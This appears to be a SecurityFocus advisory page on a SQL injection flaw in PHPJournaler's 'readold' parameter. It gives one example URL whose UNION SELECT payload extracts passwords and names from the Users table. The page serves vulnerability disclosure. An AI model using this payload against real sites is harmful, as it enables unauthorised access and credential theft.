info
discussion
exploit
solution
references
PHPJournaler Readold Variable SQL Injection Vulnerability
The following example was provided:
http://www.example.com/phpjournaler/index.php?readold=999%20union%20select%201,password,3,4,name,6%20from%20Users/*
Privacy Statement
Copyright 2010, SecurityFocus
